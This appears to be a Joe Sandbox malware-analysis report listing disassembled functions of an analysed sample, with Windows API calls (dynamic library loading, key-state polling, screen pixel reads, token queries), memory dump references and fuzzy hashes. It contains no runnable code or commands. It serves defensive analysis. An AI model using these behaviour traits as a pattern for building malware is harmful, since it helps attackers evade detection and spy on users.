Instruction Fuzzy Hash: CA512B71204208EFDB14EF58C885E7EB7E9AF84314F50891DF65987292DB39E904CB52

Function 007ED8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00779837: __itow.LIBCMT ref: 00779862
Part of subcall function 00779837: __swprintf.LIBCMT ref: 007798AC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 007ED927
GetProcAddress.KERNEL32(00000000,?), ref: 007ED9AA
GetProcAddress.KERNEL32(00000000,00000000), ref: 007ED9C6
GetProcAddress.KERNEL32(00000000,?), ref: 007EDA07
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 007EDA21

Part of subcall function 00775A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007D7896,?,?,00000000), ref: 00775A2C
Part of subcall function 00775A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007D7896,?,?,00000000,?,?), ref: 00775A50

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 7084916bbfd10039ab3bbc32f815febaeb69719e781979d154533db4eae41709
Instruction ID: 9d737b05163e1a42c43bc40561fcfd3a3941a89060f17679c228d0a471149e3f
Opcode Fuzzy Hash: 7084916bbfd10039ab3bbc32f815febaeb69719e781979d154533db4eae41709
Instruction Fuzzy Hash: E6513975A01209DFCB10EFA8C8889ADB7F5FF09310B04C069E919AB322DB78AD45CF51

Function 007DE571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 007DE61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 007DE648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 007DE687

Part of subcall function 00779837: __itow.LIBCMT ref: 00779862
Part of subcall function 00779837: __swprintf.LIBCMT ref: 007798AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 007DE6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 007DE6B4

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 2322183be3fd19dd6455a525cb630cdf7ac6746620fb3f13fa3807781916dcea
Instruction ID: e80ccad41ffe18e5e6c850beb274e081466378ece726bd552f6246217de60024
Opcode Fuzzy Hash: 2322183be3fd19dd6455a525cb630cdf7ac6746620fb3f13fa3807781916dcea
Instruction Fuzzy Hash: B3510A35A00205DFCF01EF64C985AADBBF5FF09354B1480A9E909AB362DB39ED11DB51

Function 007FA056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26a637f5916e463310fc3660e086c7a011a9b8811d4d6b6ac73bf7c187b4f537
Instruction ID: 0f3835cced31d310d19bab48f6439798a8ec4e1bf41ca61e562a1074d1d172a4
Opcode Fuzzy Hash: 26a637f5916e463310fc3660e086c7a011a9b8811d4d6b6ac73bf7c187b4f537
Instruction Fuzzy Hash: ED4193B590410CBFD720DB28DC88FB9BBB4EB09360F154165EA19A73E1DB38AD41DA51

Function 00772344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00772357
ScreenToClient.USER32(008357B0,?), ref: 00772374
GetAsyncKeyState.USER32(00000001), ref: 00772399
GetAsyncKeyState.USER32(00000002), ref: 007723A7

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 614fe0dd464837ad9aad12aefcf809c251daf1ae0e87db3f4067955698d3b3cd
Instruction ID: 9e202f7d4b8deefe0da891300e25675d728cd47cd64a58751060ae59fa23ba3c
Opcode Fuzzy Hash: 614fe0dd464837ad9aad12aefcf809c251daf1ae0e87db3f4067955698d3b3cd
Instruction Fuzzy Hash: 0A419235604109FFDF198F68CC48AEABB74FB46360F208319F838922A1CB399950DF90

Function 007C63AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007C63E7
TranslateAcceleratorW.USER32(?,?,?), ref: 007C6433
TranslateMessage.USER32(?), ref: 007C645C
DispatchMessageW.USER32(?), ref: 007C6466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007C6475

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 6598a1d97944d124ba7189db4a4c0e40771d9891d422498bd6703762613424f8
Instruction ID: 04e16b9c4c235a9c3a8ea3874c9ceb552ee9aa8352da5276bb8f160a3ea6cf3d
Opcode Fuzzy Hash: 6598a1d97944d124ba7189db4a4c0e40771d9891d422498bd6703762613424f8
Instruction Fuzzy Hash: 5131C371900686AFDB68CFB4DC84FB67BACBB41300F14457DE425C21A0EB2D9A89D760

Function 007C8A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 007C8A30
PostMessageW.USER32(?,00000201,00000001), ref: 007C8ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 007C8AE2
PostMessageW.USER32(?,00000202,00000000), ref: 007C8AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 007C8AF8

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 92045dec73d19b3be4910d9d0029efdcd38c0f700ed88bdf3c6cd031fa237f18
Instruction ID: a4fb42bb0df18d3def079849c630f2df1b69bdc194fe9f228cc4fab6cfb609c1
Opcode Fuzzy Hash: 92045dec73d19b3be4910d9d0029efdcd38c0f700ed88bdf3c6cd031fa237f18
Instruction Fuzzy Hash: 4431BC71500219EBDB14CFA8D94CBAE3BB5EF04315F10822EF925EA2D0CBB89914DB91

Function 007CB1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 007CB204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 007CB221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 007CB259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 007CB27F
_wcsstr.LIBCMT ref: 007CB289

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: a1b2acccd305be55c73e5498244749ee7c9d6fc3d72159096f4b70b1014eb891
Instruction ID: 83dbcb9eda06083587fe9d40aab72858768a5f2c584fdbd462377ac345583c2f
Opcode Fuzzy Hash: a1b2acccd305be55c73e5498244749ee7c9d6fc3d72159096f4b70b1014eb891
Instruction Fuzzy Hash: 5621C572604204BBEB259B79EC4AF7F7B98EF49760F00812DF805DA161EF69DC41D6A0

Function 007FB14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00772612: GetWindowLongW.USER32(?,000000EB), ref: 00772623

GetWindowLongW.USER32(?,000000F0), ref: 007FB192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 007FB1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 007FB1CF
GetSystemMetrics.USER32(00000004), ref: 007FB1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,007E0E90,00000000), ref: 007FB216

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: a3b7177112e04f475047aec70baea9db24eb2782c35dd2fd1db168c9b32e4ccd
Instruction ID: 944f246ddb6a5c69d3d71f74e1887abaf419f2373668de157460e9e2cd358a5a
Opcode Fuzzy Hash: a3b7177112e04f475047aec70baea9db24eb2782c35dd2fd1db168c9b32e4ccd
Instruction Fuzzy Hash: 6E216071A20659AFCB109F38DC14A7A37A4FB45361F154B39FA32D72E0D7349920CB90

Function 007C9307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007C9320

Part of subcall function 00777BCC: _memmove.LIBCMT ref: 00777C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007C9352
__itow.LIBCMT ref: 007C936A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007C9392
__itow.LIBCMT ref: 007C93A3

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 9d7ec60bc102cb3be39e9cc77a645de6ad0aea1a03af8a4eff7abd1ef09f49df
Instruction ID: 9981bee933908c63d20755e481e6f9588cabe994886df9e49ce202a9758510c4
Opcode Fuzzy Hash: 9d7ec60bc102cb3be39e9cc77a645de6ad0aea1a03af8a4eff7abd1ef09f49df
Instruction Fuzzy Hash: E521B631700248ABDB119A649C8DFAE7BA9EF49710F04802DFA05D7291DBB8C941C7A5

Function 007E5A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 007E5A6E
GetForegroundWindow.USER32 ref: 007E5A85
GetDC.USER32(00000000), ref: 007E5AC1
GetPixel.GDI32(00000000,?,00000003), ref: 007E5ACD
ReleaseDC.USER32(00000000,00000003), ref: 007E5B08

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 2bc7ddbe6d5570879ad751818f22676fd8df245f365cea6466786a70b3f286b7
Instruction ID: 44e608e3223e0606bbbfe5a7871db282d07947dab4034dc250e7e6505e81b097
Opcode Fuzzy Hash: 2bc7ddbe6d5570879ad751818f22676fd8df245f365cea6466786a70b3f286b7
Instruction Fuzzy Hash: D7218075A01204EFDB00EF65DC88A6ABBE5EF48350F14C079E819D7362CE38AC00CB55

Function 007712F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0077134D
SelectObject.GDI32(?,00000000), ref: 0077135C
BeginPath.GDI32(?), ref: 00771373
SelectObject.GDI32(?,00000000), ref: 0077139C

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: bd73de3436733972e1a7d8bfada879b552c02fe7ca9ca77003ff3ec32d435f62
Instruction ID: daba8098f5870700ebc00698b77527baac970c16b1b6aa6b952d5eea8feae92c
Opcode Fuzzy Hash: bd73de3436733972e1a7d8bfada879b552c02fe7ca9ca77003ff3ec32d435f62
Instruction Fuzzy Hash: 30218030800608EFDF109F29DC04B6A7BE8FB407A1F54CA36F818965B1DB789891DF95

Function 007CBC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 007CBCB3
_memcmp.LIBCMT ref: 007CBCD1
_memcmp.LIBCMT ref: 007CBCE4
_memcmp.LIBCMT ref: 007CBCFC
_memcmp.LIBCMT ref: 007CBD14

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: f6730149414d7f8cf92f6d7911971a1e803d67c16fc6c96849ef7b8567ef0c1a
Instruction ID: 7f15cbe451d92cec0dacdbfd65cd9c4c6a4fe30cbef5fe0e62b9820c69676f67
Opcode Fuzzy Hash: f6730149414d7f8cf92f6d7911971a1e803d67c16fc6c96849ef7b8567ef0c1a
Instruction Fuzzy Hash: D601B57174010ABBEA156B11AD87FBBB75CEE15398F04402DFD1596382EB5CEE2082F1

Function 007D4A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 007D4ABA
__beginthreadex.LIBCMT ref: 007D4AD8
MessageBoxW.USER32(?,?,?,?), ref: 007D4AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 007D4B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 007D4B0A

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 97e9defb5ae31d94fb15cc57c6957a4be9cb45a88d453341a78cbfe95f57e8d3
Instruction ID: 2b31ca4d25ae3aebebb2550384c2c671214950618e85bd986b3e3e0be74768ae
Opcode Fuzzy Hash: 97e9defb5ae31d94fb15cc57c6957a4be9cb45a88d453341a78cbfe95f57e8d3
Instruction Fuzzy Hash: 7311C8B6905658BBC7119FA8EC08AAB7FBDFF85320F148266F914D3350DA79C90487A1

Function 007C8202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007C821E
GetLastError.KERNEL32(?,007C7CE2,?,?,?), ref: 007C8228
GetProcessHeap.KERNEL32(00000008,?,?,007C7CE2,?,?,?), ref: 007C8237
HeapAlloc.KERNEL32(00000000,?,007C7CE2,?,?,?), ref: 007C823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007C8255

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: cd7f32b4e21e020fe33c130085f370b1cdc7e2a80dd8a0bfe0dc92c1803ee1f6
Instruction ID: 3eaab2df802b52b2291d32a5990da82aeffacccc2e615684874e23437a34f1c9
Opcode Fuzzy Hash: cd7f32b4e21e020fe33c130085f370b1cdc7e2a80dd8a0bfe0dc92c1803ee1f6
Instruction Fuzzy Hash: 8C016971200608BFDB204FAADC8CEBB7BACFF8A754B50452DF909C2220DE358C00CA60

Function 007C710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C7044,80070057,?,?,?,007C7455), ref: 007C7127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C7044,80070057,?,?), ref: 007C7142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C7044,80070057,?,?), ref: 007C7150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C7044,80070057,?), ref: 007C7160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C7044,80070057,?,?), ref: 007C716C

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: abf92fa03b7af06dd5b1e38356d48f6dd42ad7a2ec325e7450b0e7b92e292bda
Instruction ID: a812b881a17314839477b4386133a18dc260ea2c8247ac97a20f890d0984f4c9
Opcode Fuzzy Hash: abf92fa03b7af06dd5b1e38356d48f6dd42ad7a2ec325e7450b0e7b92e292bda
Instruction Fuzzy Hash: CE015A72601208ABDB154F65DC44FAA7BADEF847A1F18806CFD04D6220DF39DD40EBA0

Function 007D5244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007D5260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 007D526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 007D5276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 007D5280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007D52BC

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 2e7cd3f15575541fa8ab8bd138d65930d0d2380c48ed3954d65ec42c1afdf7b5
Instruction ID: 0507ee3aa8d050ffade97f7f8aea483bca5fd5f4f18e328949e8313b1c192712
Opcode Fuzzy Hash: 2e7cd3f15575541fa8ab8bd138d65930d0d2380c48ed3954d65ec42c1afdf7b5
Instruction Fuzzy Hash: A9010571D01A1DDBCF00AFA4E8499EEBB78BF0D711F404156E941B2245DF386958C7A5

Function 007C810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007C8121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007C812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007C813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8157

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
